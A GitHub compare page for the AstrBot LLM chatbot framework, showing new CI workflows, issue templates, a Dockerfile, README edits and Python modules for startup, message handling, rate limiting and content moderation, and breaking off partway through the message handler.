Compare commits: publish2.1...v3.3.13 (789 commits)
Commit list (789 commits, first listed 3b77df0556, last listed 6d4d2bf84d): only abbreviated SHA1 values survived extraction; the Author, Date, and commit-message columns of the source table are empty, so the per-commit table is reduced to this placeholder.

.codecov.yml (new file, +3)
@@ -0,0 +1,3 @@
comment:
  layout: "condensed_header, condensed_files, condensed_footer"
  hide_project_coverage: TRUE

.coveragerc (new file, +5)
@@ -0,0 +1,5 @@
[run]
omit =
    */site-packages/*
    */dist-packages/*
    your_package_name/tests/*

.dockerignore (new file, +18)
@@ -0,0 +1,18 @@
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
# github acions
.github/
.*ignore
.git/
# User-specific stuff
.idea/
# Byte-compiled / optimized / DLL files
__pycache__/
# Environments
.env
.venv
env/
venv*/
ENV/
.conda/
README*.md

.github/ISSUE_TEMPLATE/bug-report.yml (vendored; new file, +82)
@@ -0,0 +1,82 @@
name: '🐛 报告 Bug'
title: '[Bug]'
description: 提交报告帮助我们改进。
labels: [ 'bug' ]
body:
  - type: markdown
    attributes:
      value: |
        感谢您抽出时间报告问题!请准确解释您的问题。如果可能,请提供一个可复现的片段(这有助于更快地解决问题)。
  - type: textarea
    attributes:
      label: 发生了什么
      description: 描述你遇到的异常
      placeholder: >
        一个清晰且具体的描述这个异常是什么。
    validations:
      required: true

  - type: textarea
    attributes:
      label: 如何复现?
      description: >
        复现该问题的步骤
      placeholder: >
        如: 1. 打开 '...'
    validations:
      required: true

  - type: textarea
    attributes:
      label: AstrBot 版本与部署方式
      description: >
        请提供您的 AstrBot 版本和部署方式。
      placeholder: >
        如: 3.1.8 Docker, 3.1.7 Windows启动器
    validations:
      required: true

  - type: dropdown
    attributes:
      label: 操作系统
      description: |
        你在哪个操作系统上遇到了这个问题?
      multiple: false
      options:
        - 'Windows'
        - 'macOS'
        - 'Linux'
        - 'Other'
        - 'Not sure'
    validations:
      required: true

  - type: textarea
    attributes:
      label: 额外信息
      description: >
        任何额外信息,如报错日志、截图等。
      placeholder: >
        请提供完整的报错日志或截图。
    validations:
      required: true

  - type: checkboxes
    attributes:
      label: 你愿意提交 PR 吗?
      description: >
        这绝对不是必需的,但我们很乐意在贡献过程中为您提供指导特别是如果你已经很好地理解了如何实现修复。
      options:
        - label: 是的,我愿意提交 PR!

  - type: checkboxes
    attributes:
      label: Code of Conduct
      options:
        - label: >
            我已阅读并同意遵守该项目的 [行为准则](https://docs.github.com/zh/site-policy/github-terms/github-community-code-of-conduct)。
          required: true

  - type: markdown
    attributes:
      value: "感谢您填写我们的表单!"

.github/ISSUE_TEMPLATE/feature-request.yml (vendored; new file, +42)
@@ -0,0 +1,42 @@
name: '🎉 功能建议'
title: "[Feature]"
description: 提交建议帮助我们改进。
labels: [ "enhancement" ]
body:
  - type: markdown
    attributes:
      value: |
        感谢您抽出时间提出新功能建议,请准确解释您的想法。

  - type: textarea
    attributes:
      label: 描述
      description: 简短描述您的功能建议。

  - type: textarea
    attributes:
      label: 使用场景
      description: 你想要发生什么?
      placeholder: >
        一个清晰且具体的描述这个功能的使用场景。

  - type: checkboxes
    attributes:
      label: 你愿意提交PR吗?
      description: >
        这不是必须的,但我们欢迎您的贡献。
      options:
        - label: 是的, 我愿意提交PR!

  - type: checkboxes
    attributes:
      label: Code of Conduct
      options:
        - label: >
            我已阅读并同意遵守该项目的 [行为准则](https://docs.github.com/zh/site-policy/github-terms/github-community-code-of-conduct)。
          required: true

  - type: markdown
    attributes:
      value: "感谢您填写我们的表单!"

.github/PULL_REQUEST_TEMPLATE.md (vendored; new file, +10)
@@ -0,0 +1,10 @@
<!-- 如果有的话,指定这个 PR 要解决的 ISSUE -->
修复了 #XYZ

### Motivation

<!--解释为什么要改动-->

### Modifications

<!--简单解释你的改动-->

.github/workflows/codeql.yml (vendored; new file, +93)
@@ -0,0 +1,93 @@
# For most projects, this workflow file will not need changing; you simply need
# to commit it to your repository.
#
# You may wish to alter this file to override the set of languages analyzed,
# or to provide custom queries or build logic.
#
# ******** NOTE ********
# We have attempted to detect the languages in your repository. Please check
# the `language` matrix defined below to confirm you have the correct set of
# supported CodeQL languages.
#
name: "CodeQL"

on:
  push:
    branches: [ "master" ]
  pull_request:
    branches: [ "master" ]
  schedule:
    - cron: '21 15 * * 5'

jobs:
  analyze:
    name: Analyze (${{ matrix.language }})
    # Runner size impacts CodeQL analysis time. To learn more, please see:
    #   - https://gh.io/recommended-hardware-resources-for-running-codeql
    #   - https://gh.io/supported-runners-and-hardware-resources
    #   - https://gh.io/using-larger-runners (GitHub.com only)
    # Consider using larger runners or machines with greater resources for possible analysis time improvements.
    runs-on: ${{ (matrix.language == 'swift' && 'macos-latest') || 'ubuntu-latest' }}
    timeout-minutes: ${{ (matrix.language == 'swift' && 120) || 360 }}
    permissions:
      # required for all workflows
      security-events: write

      # required to fetch internal or private CodeQL packs
      packages: read

      # only required for workflows in private repositories
      actions: read
      contents: read

    strategy:
      fail-fast: false
      matrix:
        include:
          - language: python
            build-mode: none
        # CodeQL supports the following values keywords for 'language': 'c-cpp', 'csharp', 'go', 'java-kotlin', 'javascript-typescript', 'python', 'ruby', 'swift'
        # Use `c-cpp` to analyze code written in C, C++ or both
        # Use 'java-kotlin' to analyze code written in Java, Kotlin or both
        # Use 'javascript-typescript' to analyze code written in JavaScript, TypeScript or both
        # To learn more about changing the languages that are analyzed or customizing the build mode for your analysis,
        # see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/customizing-your-advanced-setup-for-code-scanning.
        # If you are analyzing a compiled language, you can modify the 'build-mode' for that language to customize how
        # your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      # Initializes the CodeQL tools for scanning.
      - name: Initialize CodeQL
        uses: github/codeql-action/init@v3
        with:
          languages: ${{ matrix.language }}
          build-mode: ${{ matrix.build-mode }}
          # If you wish to specify custom queries, you can do so here or in a config file.
          # By default, queries listed here will override any specified in a config file.
          # Prefix the list here with "+" to use these queries and those in the config file.

          # For more details on CodeQL's query packs, refer to: https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs
          # queries: security-extended,security-and-quality

      # If the analyze step fails for one of the languages you are analyzing with
      # "We were unable to automatically build your code", modify the matrix above
      # to set the build mode to "manual" for that language. Then modify this step
      # to build your code.
      # ℹ️ Command-line programs to run using the OS shell.
      # 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun
      - if: matrix.build-mode == 'manual'
        shell: bash
        run: |
          echo 'If you are using a "manual" build mode for one or more of the' \
            'languages you are analyzing, replace this with the commands to build' \
            'your code, for example:'
          echo '  make bootstrap'
          echo '  make release'
          exit 1

      - name: Perform CodeQL Analysis
        uses: github/codeql-action/analyze@v3
        with:
          category: "/language:${{matrix.language}}"

.github/workflows/coverage_test.yml (vendored; new file, +39)
@@ -0,0 +1,39 @@
name: Run tests and upload coverage

on:
  push

jobs:
  test:
    name: Run tests and collect coverage
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Set up Python
        uses: actions/setup-python@v4

      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          pip install -r requirements.txt
          pip install pytest pytest-cov pytest-asyncio
          mkdir data
          mkdir data/plugins
          mkdir data/config
          mkdir temp

      - name: Run tests
        run: |
          export LLM_MODEL=${{ secrets.LLM_MODEL }}
          export OPENAI_API_BASE=${{ secrets.OPENAI_API_BASE }}
          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
          PYTHONPATH=./ pytest --cov=. tests/ -v

      - name: Upload results to Codecov
        uses: codecov/codecov-action@v4
        with:
          token: ${{ secrets.CODECOV_TOKEN }}

.github/workflows/docker-image.yml (vendored; new file, +42)
@@ -0,0 +1,42 @@
name: Docker Image CI/CD

on:
  release:
    types: [published]
  workflow_dispatch:

jobs:
  publish-docker:
    runs-on: ubuntu-latest

    steps:
      - name: 拉取源码
        uses: actions/checkout@v3
        with:
          fetch-depth: 1

      - name: 设置 QEMU
        uses: docker/setup-qemu-action@v3

      - name: 设置 Docker Buildx
        uses: docker/setup-buildx-action@v3

      - name: 登录到 DockerHub
        uses: docker/login-action@v3
        with:
          username: ${{ secrets.DOCKER_HUB_USERNAME }}
          password: ${{ secrets.DOCKER_HUB_PASSWORD }}

      - name: 构建和推送 Docker hub
        uses: docker/build-push-action@v6
        with:
          context: .
          platforms: linux/amd64,linux/arm64
          push: true
          tags: |
            ${{ secrets.DOCKER_HUB_USERNAME }}/astrbot:latest
            ${{ secrets.DOCKER_HUB_USERNAME }}/astrbot:${{ github.event.release.tag_name }}

      - name: Post build notifications
        run: echo "Docker image has been built and pushed successfully"

.github/workflows/stale.yml (vendored; new file, +27)
@@ -0,0 +1,27 @@
# This workflow warns and then closes issues and PRs that have had no activity for a specified amount of time.
#
# You can adjust the behavior by modifying this file.
# For more information, see:
# https://github.com/actions/stale
name: Mark stale issues and pull requests

on:
  schedule:
    - cron: '21 23 * * *'

jobs:
  stale:

    runs-on: ubuntu-latest
    permissions:
      issues: write
      pull-requests: write

    steps:
      - uses: actions/stale@v5
        with:
          repo-token: ${{ secrets.GITHUB_TOKEN }}
          stale-issue-message: 'Stale issue message'
          stale-pr-message: 'Stale pull request message'
          stale-issue-label: 'no-issue-activity'
          stale-pr-label: 'no-pr-activity'

.gitignore (vendored; new file, +14)
@@ -0,0 +1,14 @@
__pycache__
botpy.log
.vscode
data.db
configs/session
configs/config.yaml
**/.DS_Store
temp
cmd_config.json
data/*
cookies.json
logs/
addons/plugins
.coverage

.vscode/settings.json (vendored; deleted, -3)
@@ -1,3 +0,0 @@
{
    "python.analysis.typeCheckingMode": "basic"
}

CODE_OF_CONDUCT.md (new file, +128)
@@ -0,0 +1,128 @@
# Contributor Covenant Code of Conduct

## Our Pledge

We as members, contributors, and leaders pledge to make participation in our
community a harassment-free experience for everyone, regardless of age, body
size, visible or invisible disability, ethnicity, sex characteristics, gender
identity and expression, level of experience, education, socio-economic status,
nationality, personal appearance, race, religion, or sexual identity
and orientation.

We pledge to act and interact in ways that contribute to an open, welcoming,
diverse, inclusive, and healthy community.

## Our Standards

Examples of behavior that contributes to a positive environment for our
community include:

* Demonstrating empathy and kindness toward other people
* Being respectful of differing opinions, viewpoints, and experiences
* Giving and gracefully accepting constructive feedback
* Accepting responsibility and apologizing to those affected by our mistakes,
  and learning from the experience
* Focusing on what is best not just for us as individuals, but for the
  overall community

Examples of unacceptable behavior include:

* The use of sexualized language or imagery, and sexual attention or
  advances of any kind
* Trolling, insulting or derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or email
  address, without their explicit permission
* Other conduct which could reasonably be considered inappropriate in a
  professional setting

## Enforcement Responsibilities

Community leaders are responsible for clarifying and enforcing our standards of
acceptable behavior and will take appropriate and fair corrective action in
response to any behavior that they deem inappropriate, threatening, offensive,
or harmful.

Community leaders have the right and responsibility to remove, edit, or reject
comments, commits, code, wiki edits, issues, and other contributions that are
not aligned to this Code of Conduct, and will communicate reasons for moderation
decisions when appropriate.

## Scope

This Code of Conduct applies within all community spaces, and also applies when
an individual is officially representing the community in public spaces.
Examples of representing our community include using an official e-mail address,
posting via an official social media account, or acting as an appointed
representative at an online or offline event.

## Enforcement

Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported to the community leaders responsible for enforcement at
SoulterL@outlook.com.
All complaints will be reviewed and investigated promptly and fairly.

All community leaders are obligated to respect the privacy and security of the
reporter of any incident.

## Enforcement Guidelines

Community leaders will follow these Community Impact Guidelines in determining
the consequences for any action they deem in violation of this Code of Conduct:

### 1. Correction

**Community Impact**: Use of inappropriate language or other behavior deemed
unprofessional or unwelcome in the community.

**Consequence**: A private, written warning from community leaders, providing
clarity around the nature of the violation and an explanation of why the
behavior was inappropriate. A public apology may be requested.

### 2. Warning

**Community Impact**: A violation through a single incident or series
of actions.

**Consequence**: A warning with consequences for continued behavior. No
interaction with the people involved, including unsolicited interaction with
those enforcing the Code of Conduct, for a specified period of time. This
includes avoiding interactions in community spaces as well as external channels
like social media. Violating these terms may lead to a temporary or
permanent ban.

### 3. Temporary Ban

**Community Impact**: A serious violation of community standards, including
sustained inappropriate behavior.

**Consequence**: A temporary ban from any sort of interaction or public
communication with the community for a specified period of time. No public or
private interaction with the people involved, including unsolicited interaction
with those enforcing the Code of Conduct, is allowed during this period.
Violating these terms may lead to a permanent ban.

### 4. Permanent Ban

**Community Impact**: Demonstrating a pattern of violation of community
standards, including sustained inappropriate behavior, harassment of an
individual, or aggression toward or disparagement of classes of individuals.

**Consequence**: A permanent ban from any sort of public interaction within
the community.

## Attribution

This Code of Conduct is adapted from the [Contributor Covenant][homepage],
version 2.0, available at
https://www.contributor-covenant.org/version/2/0/code_of_conduct.html.

Community Impact Guidelines were inspired by [Mozilla's code of conduct
enforcement ladder](https://github.com/mozilla/diversity).

[homepage]: https://www.contributor-covenant.org

For answers to common questions about this code of conduct, see the FAQ at
https://www.contributor-covenant.org/faq. Translations are available at
https://www.contributor-covenant.org/translations.

Dockerfile (new file, +20)
@@ -0,0 +1,20 @@
FROM python:3.10-slim
WORKDIR /AstrBot

COPY . /AstrBot/

RUN apt-get update && apt-get install -y --no-install-recommends \
    gcc \
    build-essential \
    python3-dev \
    libffi-dev \
    libssl-dev \
    && apt-get clean \
    && rm -rf /var/lib/apt/lists/*

RUN python -m pip install -r requirements.txt

EXPOSE 6185
EXPOSE 6186

CMD [ "python", "main.py" ]

README.md (modified; the +/- markers were lost in extraction, so removed and added lines appear together below)
@@ -1,114 +1,67 @@
## ⭐体验
扫码加入QQ频道
<p align="center">


<img width="750" alt="image" src="https://github.com/Soulter/AstrBot/assets/37870767/c6f057d9-46d7-4144-8116-00a962941746">

</p>
<div align="center">

[](https://github.com/Soulter/AstrBot/releases/latest)
<img src="https://img.shields.io/badge/python-3.9+-blue.svg" alt="python">
<a href="https://hub.docker.com/r/soulter/astrbot"><img alt="Docker pull" src="https://img.shields.io/docker/pulls/soulter/astrbot.svg"/></a>
[](https://codecov.io/gh/Soulter/AstrBot)
<a href="https://qm.qq.com/cgi-bin/qm/qr?k=EYGsuUTfe00_iOu9JTXS7_TEpMkXOvwv&jump_from=webapi&authKey=uUEMKCROfsseS+8IzqPjzV3y1tzy4AkykwTib2jNkOFdzezF9s9XknqnIaf3CDft">
<img alt="Static Badge" src="https://img.shields.io/badge/QQ群-322154837-purple">
</a>

<a href="https://astrbot.soulter.top/docs/main">快速开始</a> |
<a href="https://github.com/Soulter/AstrBot/issues">问题提交</a> |
<a href="https://astrbot.soulter.top/docs/develop/plugin4p">插件开发</a>
</div>

## 🛠️ 功能

🌍 支持的消息平台
- QQ 群、QQ 频道(OneBot、QQ 官方接口)
- Telegram([astrbot_plugin_telegram](https://github.com/Soulter/astrbot_plugin_telegram) 插件)

🌍 支持的大模型/底座:

- OpenAI GPT、DallE 系列
- Claude(由[LLMs插件](https://github.com/Soulter/llms)支持)
- HuggingChat(由[LLMs插件](https://github.com/Soulter/llms)支持)
- Gemini(由[LLMs插件](https://github.com/Soulter/llms)支持)
- Ollama
- 几乎所有已知模型(可接入 [OneAPI](https://astrbot.soulter.top/docs/docs/adavanced/one-api))

🌍 机器人支持的能力一览:
- 大模型对话、人格、网页搜索
- 可视化仪表盘
- 同时处理多平台消息
- 精确到个人的会话隔离
- 插件支持
- 文本转图片回复(Markdown)

## 🧩 插件

有关插件的使用和列表请移步:[AstrBot 文档 - 插件](https://astrbot.soulter.top/docs/get-started/plugin)

## 云部署

[](https://repl.it/github/Soulter/AstrBot)

## ❤️ 贡献

欢迎任何 Issues/Pull Requests!只需要将你的更改提交到此项目 :)

对于新功能的添加,请先通过 Issue 进行讨论。

## 🔭 展望

- [ ] 更多、更开放的 LLM Agent 能力

## ✨ Demo

<img width="900" alt="image" src="https://github.com/Soulter/AstrBot/assets/37870767/824d1ff3-7b85-481c-b795-8e62dedb9fd7">

**推荐Windows一键安装(版本更新更及时)!!**
**请前往Release下载最新版本**

**详细部署教程链接**https://soulter.top/posts/qpdg.html

**详细部署教程链接**https://soulter.top/posts/qpdg.html

**详细部署教程链接**https://soulter.top/posts/qpdg.html

有任何问题请加频道反馈。

## ⭐功能:

### 基本功能
<details>
<summary>✅ 回复符合上下文</summary>

- 程序向API发送近多次对话内容,模型根据上下文生成回复

- 你可在`configs/config.yaml`中修改`total_token_limit`来近似控制缓存大小。
</details>

<details>
<summary>✅ 超额自动切换</summary>

- 超额时,程序自动切换openai的key,方便快捷

</details>

<details>

<summary>✅ 支持统计频道、消息数量等信息</summary>

- 实现了简单的统计功能

</details>

<details>
<summary>✅ 多并发处理,回复速度快</summary>

- 使用了协程,理论最高可以支持每个子频道每秒回复5条信息

</details>

<details>
<summary>✅ 持久化转储历史记录,重启不丢失</summary>

- 使用内置的sqlite数据库存储历史记录到本地

- 方式为定时转储,可在`config.yaml`下修改`dump_history_interval`来修改间隔时间,单位为分钟。

</details>

<details>
<summary>✅ 支持指令控制</summary>

- 详见下方`指令功能`

</details>

<details>
<summary>✅ 官方API,稳定</summary>

- 不使用ChatGPT逆向接口,而使用官方API接口,稳定方便。

- QQ频道机器人框架为QQ官方开源的框架,稳定。

</details>

> 关于token:token就相当于是AI中的单词数(但是不等于单词数),`text-davinci-003`模型中最大可以支持`4097`个token。在发送信息时,这个机器人会将用户的历史聊天记录打包发送给ChatGPT,因此,`token`也会相应的累加,为了保证聊天的上下文的逻辑性,就有了缓存token。
### 指令功能
需要先`@`机器人之后再输入指令
- `/reset`重置prompt
- `/his`查看历史记录(每个用户都有独立的会话)
- `/his [页码数]`查看不同页码的历史记录。例如`/his 2`查看第2页
- `/token`查看当前缓存的总token数
- `/count` 查看统计
- `/status` 查看chatGPT的配置

## 📰使用方法:

### 安装第三方库

使用Python的pip工具安装
- `qq-botpy` (QQ频道官方Python SDK)
- `openai` (OpenAI 库)
```shell
pip install -r requirements.txt
```
> ⚠注意,由于qq-botpy需要运行在`Python 3.8+`的版本上,因此本项目也需要在此之上运行

### 配置

- 获得 OpenAI的key [OpenAI](https://beta.openai.com/)
- 获得 QQ开放平台下QQ频道机器人的token和appid [QQ开放平台](https://q.qq.com/),一个QQ频道机器人(很容易创建~)
- 在configs/config.yaml下进行配置

### 启动
- 启动main.py

## DEMO




astrbot/bootstrap.py (new file, +132)
@@ -0,0 +1,132 @@
import asyncio
import traceback
import os
from astrbot.message.handler import MessageHandler
from astrbot.persist.helper import dbConn
from dashboard.server import AstrBotDashBoard
from model.command.manager import CommandManager
from model.command.internal_handler import InternalCommandHandler
from model.plugin.manager import PluginManager
from model.platform.manager import PlatformManager
from typing import Union
from type.types import Context
from type.config import VERSION
from SparkleLogging.utils.core import LogManager
from logging import Logger
from util.cmd_config import AstrBotConfig, try_migrate
from util.metrics import MetricUploader
from util.updator.astrbot_updator import AstrBotUpdator

logger: Logger = LogManager.GetLogger(log_name='astrbot')


class AstrBotBootstrap():
    def __init__(self) -> None:
        self.context = Context()

        # load configs and ensure the backward compatibility
        try_migrate()
        self.config_helper = AstrBotConfig()
        self.context.config_helper = self.config_helper
        logger.info("AstrBot v" + VERSION)
        # apply proxy settings
        http_proxy = self.context.config_helper.http_proxy
        https_proxy = self.context.config_helper.https_proxy
        if http_proxy:
            os.environ['HTTP_PROXY'] = http_proxy
        if https_proxy:
            os.environ['HTTPS_PROXY'] = https_proxy
        os.environ['NO_PROXY'] = 'https://api.sgroup.qq.com'

        if http_proxy and https_proxy:
            logger.info(f"使用代理: {http_proxy}, {https_proxy}")
        else:
            logger.info("未使用代理。")

        self.test_mode = os.environ.get('TEST_MODE', 'off') == 'on'

    async def run(self):
        self.command_manager = CommandManager()
        self.plugin_manager = PluginManager(self.context)
        self.updator = AstrBotUpdator()
        self.cmd_handler = InternalCommandHandler(self.command_manager, self.plugin_manager)
        self.db_conn_helper = dbConn()

        # load llm provider
        self.load_llm()

        self.message_handler = MessageHandler(self.context, self.command_manager, self.db_conn_helper)
        self.platfrom_manager = PlatformManager(self.context, self.message_handler)
        self.dashboard = AstrBotDashBoard(self.context, plugin_manager=self.plugin_manager, astrbot_updator=self.updator)
        self.metrics_uploader = MetricUploader(self.context)

        self.context.metrics_uploader = self.metrics_uploader
        self.context.updator = self.updator
        self.context.plugin_updator = self.plugin_manager.updator
        self.context.message_handler = self.message_handler
        self.context.command_manager = self.command_manager

        # load dashboard
        self.dashboard.run_http_server()
        dashboard_task = asyncio.create_task(self.dashboard.ws_server(), name="dashboard")

        if self.test_mode:
            return

        # load plugins, plugins' commands.
        self.load_plugins()
        self.command_manager.register_from_pcb(self.context.plugin_command_bridge)

        # load platforms
        platform_tasks = self.load_platform()
        # load metrics uploader
        metrics_upload_task = asyncio.create_task(self.metrics_uploader.upload_metrics(), name="metrics-uploader")

        tasks = [metrics_upload_task, dashboard_task, *platform_tasks, *self.context.ext_tasks]
        tasks = [self.handle_task(task) for task in tasks]
        await asyncio.gather(*tasks)

    async def handle_task(self, task: Union[asyncio.Task, asyncio.Future]):
        while True:
            try:
                result = await task
                return result
            except asyncio.CancelledError:
                logger.info(f"{task.get_name()} 任务已取消。")
                return
            except Exception as e:
                logger.error(traceback.format_exc())
                logger.error(f"{task.get_name()} 任务发生错误。")
                return

    def load_llm(self):
        f = False
        llms = self.context.config_helper.llm
        logger.info(f"加载 {len(llms)} 个 LLM Provider...")
        for llm in llms:
            if llm.enable:
                if llm.name == "openai" and llm.key and llm.enable:
                    self.load_openai(llm)
                    f = True
                    logger.info(f"已启用 OpenAI API 支持。")
                else:
                    logger.warn(f"未知的 LLM Provider: {llm.name}")
        if f:
            from model.command.openai_official_handler import OpenAIOfficialCommandHandler
            self.openai_command_handler = OpenAIOfficialCommandHandler(self.command_manager)
            self.openai_command_handler.set_provider(self.context.llms[0].llm_instance)

    def load_openai(self, llm_config):
        from model.provider.openai_official import ProviderOpenAIOfficial
        inst = ProviderOpenAIOfficial(llm_config)
        self.context.register_provider("internal_openai", inst)

    def load_plugins(self):
        self.plugin_manager.plugin_reload()

    def load_platform(self):
        platforms = self.platfrom_manager.load_platforms()
        if not platforms:
            logger.warn("未启用任何消息平台。")
        return platforms
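
For orientation, a minimal sketch of how an entrypoint could drive `AstrBotBootstrap`. The diff exposes port 6185/6186 and runs `main.py`, but `main.py` itself is not part of this compare, so the module path and the bare `asyncio.run` wiring below are assumptions, not the project's actual startup code.

```python
# Hypothetical entrypoint sketch; main.py is not shown in this diff, so this
# wiring is an assumption based on AstrBotBootstrap.run() being a coroutine.
import asyncio

from astrbot.bootstrap import AstrBotBootstrap

if __name__ == "__main__":
    bootstrap = AstrBotBootstrap()   # loads config, applies proxy settings
    asyncio.run(bootstrap.run())     # starts dashboard, platforms, metrics uploader
```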

astrbot/message/baidu_aip_judge.py (new file, +28)
@@ -0,0 +1,28 @@
from aip import AipContentCensor
from util.cmd_config import BaiduAIPConfig


class BaiduJudge:
    def __init__(self, baidu_configs: BaiduAIPConfig) -> None:
        self.app_id = baidu_configs.app_id
        self.api_key = baidu_configs.api_key
        self.secret_key = baidu_configs.secret_key
        self.client = AipContentCensor(self.app_id,
                                       self.api_key,
                                       self.secret_key)

    def judge(self, text):
        res = self.client.textCensorUserDefined(text)
        if 'conclusionType' not in res:
            return False, "百度审核服务未知错误"
        if res['conclusionType'] == 1:
            return True, "合规"
        else:
            if 'data' not in res:
                return False, "百度审核服务未知错误"
            count = len(res['data'])
            info = f"百度审核服务发现 {count} 处违规:\n"
            for i in res['data']:
                info += f"{i['msg']};\n"
            info += "\n判断结果:"+res['conclusion']
            return False, info

astrbot/message/handler.py (new file, +286)
@@ -0,0 +1,286 @@
import time, json
import re, os
import asyncio
import traceback
import astrbot.message.unfit_words as uw

from typing import Dict
from astrbot.persist.helper import dbConn
from model.provider.provider import Provider
from model.command.manager import CommandManager
from type.message_event import AstrMessageEvent, MessageResult
from type.types import Context
from type.command import CommandResult
from SparkleLogging.utils.core import LogManager
from logging import Logger
from nakuru.entities.components import Image
from util.agent.func_call import FuncCall
import util.agent.web_searcher as web_searcher
from openai._exceptions import *
from openai.types.chat.chat_completion_message_tool_call import Function

logger: Logger = LogManager.GetLogger(log_name='astrbot')


class RateLimitHelper():
    def __init__(self, context: Context) -> None:
        self.user_rate_limit: Dict[int, int] = {}
        rl = context.config_helper.platform_settings.rate_limit
        self.rate_limit_time: int = rl.time
        self.rate_limit_count: int = rl.count
        self.user_frequency = {}

    def check_frequency(self, session_id: str) -> bool:
        '''
        检查发言频率
        '''
        ts = int(time.time())
        if session_id in self.user_frequency:
            if ts-self.user_frequency[session_id]['time'] > self.rate_limit_time:
                self.user_frequency[session_id]['time'] = ts
                self.user_frequency[session_id]['count'] = 1
                return True
            else:
                if self.user_frequency[session_id]['count'] >= self.rate_limit_count:
                    return False
                else:
                    self.user_frequency[session_id]['count'] += 1
                    return True
        else:
            t = {'time': ts, 'count': 1}
            self.user_frequency[session_id] = t
            return True


class ContentSafetyHelper():
    def __init__(self, context: Context) -> None:
        self.baidu_judge = None
        aip = context.config_helper.content_safety.baidu_aip
        if aip.enable:
            try:
                from astrbot.message.baidu_aip_judge import BaiduJudge
                self.baidu_judge = BaiduJudge(aip)
                logger.info("已启用百度 AI 内容审核。")
            except ImportError as e:
                logger.error("检测到库依赖不完整,将不会启用百度 AI 内容审核。请先使用 pip 安装 `baidu_aip` 包。")
                logger.error(e)
            except BaseException as e:
                logger.error("百度 AI 内容审核初始化失败。")
                logger.error(e)

    async def check_content(self, content: str) -> bool:
        '''
        检查文本内容是否合法
        '''
        for i in uw.unfit_words_q:
            matches = re.match(i, content.strip(), re.I | re.M)
            if matches:
                return False
        if self.baidu_judge != None:
            check, msg = await asyncio.to_thread(self.baidu_judge.judge, content)
            if not check:
                logger.info(f"百度 AI 内容审核发现以下违规:{msg}")
                return False
        return True

    def filter_content(self, content: str) -> str:
        '''
        过滤文本内容
        '''
        for i in uw.unfit_words_q:
            content = re.sub(i, "*", content, flags=re.I)
        return content

    def baidu_check(self, content: str) -> bool:
        '''
        使用百度 AI 内容审核检查文本内容是否合法
        '''
        if self.baidu_judge != None:
            check, msg = self.baidu_judge.judge(content)
            if not check:
                logger.info(f"百度 AI 内容审核发现以下违规:{msg}")
                return False
        return True


class MessageHandler():
    def __init__(self, context: Context,
                 command_manager: CommandManager,
                 persist_manager: dbConn) -> None:
        self.context = context
        self.command_manager = command_manager
        self.persist_manager = persist_manager
        self.rate_limit_helper = RateLimitHelper(context)
        self.content_safety_helper = ContentSafetyHelper(context)
        self.llm_wake_prefix = self.context.config_helper.llm_settings.wake_prefix
        if self.llm_wake_prefix:
            self.llm_wake_prefix = self.llm_wake_prefix.strip()
        self.provider = self.context.llms[0].llm_instance if len(self.context.llms) > 0 else None
        self.reply_prefix = str(self.context.config_helper.platform_settings.reply_prefix)
        self.llm_tools = FuncCall(self.provider)

    def set_provider(self, provider: Provider):
        self.provider = provider

    async def handle(self, message: AstrMessageEvent, llm_provider: Provider = None) -> MessageResult:
        '''
        Handle the message event, including commands, plugins, etc.

        `llm_provider`: the provider to use for LLM. If None, use the default provider
        '''
        msg_plain = message.message_str.strip()
        provider = llm_provider if llm_provider else self.provider

        if os.environ.get('TEST_MODE', 'off') != 'on':
            self.persist_manager.record_message(message.platform.platform_name, message.session_id)

        # TODO: this should be configurable
        # if not message.message_str:
        #     return MessageResult("Hi~")

        # check the rate limit
        if not self.rate_limit_helper.check_frequency(message.message_obj.sender.user_id):
            logger.warning(f"用户 {message.message_obj.sender.user_id} 的发言频率超过限制,已忽略。")
            return

        # remove the nick prefix
        for nick in self.context.config_helper.wake_prefix:
            if msg_plain.startswith(nick):
                msg_plain = msg_plain.removeprefix(nick)
                break
        message.message_str = msg_plain

        # scan candidate commands
        cmd_res = await self.command_manager.scan_command(message, self.context)
        if cmd_res:
            assert(isinstance(cmd_res, CommandResult))
            return MessageResult(
                cmd_res.message_chain,
                is_command_call=True,
                use_t2i=cmd_res.is_use_t2i
            )

        # middlewares
        for middleware in self.context.middlewares:
            try:
                logger.info(f"执行中间件 {middleware.origin}/{middleware.name}...")
                await middleware.func(message, self.context)
            except BaseException as e:
                logger.error(f"中间件 {middleware.origin}/{middleware.name} 处理消息时发生异常:{e},跳过。")
                logger.error(traceback.format_exc())

        if message.only_command:
            return

        # next is the LLM part
        # check if the message is a llm-wake-up command
        if self.llm_wake_prefix and not msg_plain.startswith(self.llm_wake_prefix):
            logger.debug(f"消息 `{msg_plain}` 没有以 LLM 唤醒前缀 `{self.llm_wake_prefix}` 开头,忽略。")
            return

        if not provider:
            logger.debug("没有任何 LLM 可用,忽略。")
            return

        # check the content safety
        if not await self.content_safety_helper.check_content(msg_plain):
            return MessageResult("信息包含违规内容,由于机器人管理者开启内容安全审核,你的此条消息已被停止继续处理。")

        image_url = None
        for comp in message.message_obj.message:
            if isinstance(comp, Image):
                image_url = comp.url if comp.url else comp.file
                break
        try:
            if not self.llm_tools.empty():
                # tools-use
                tool_use_flag = True
                llm_result = await provider.text_chat(
                    prompt=msg_plain,
                    session_id=message.session_id,
                    tools=self.llm_tools.get_func()
                )

                if isinstance(llm_result, Function):
                    logger.debug(f"function-calling: {llm_result}")
                    func_obj = None
                    for i in self.llm_tools.func_list:
                        if i["name"] == llm_result.name:
                            func_obj = i["func_obj"]
                            break
                    if not func_obj:
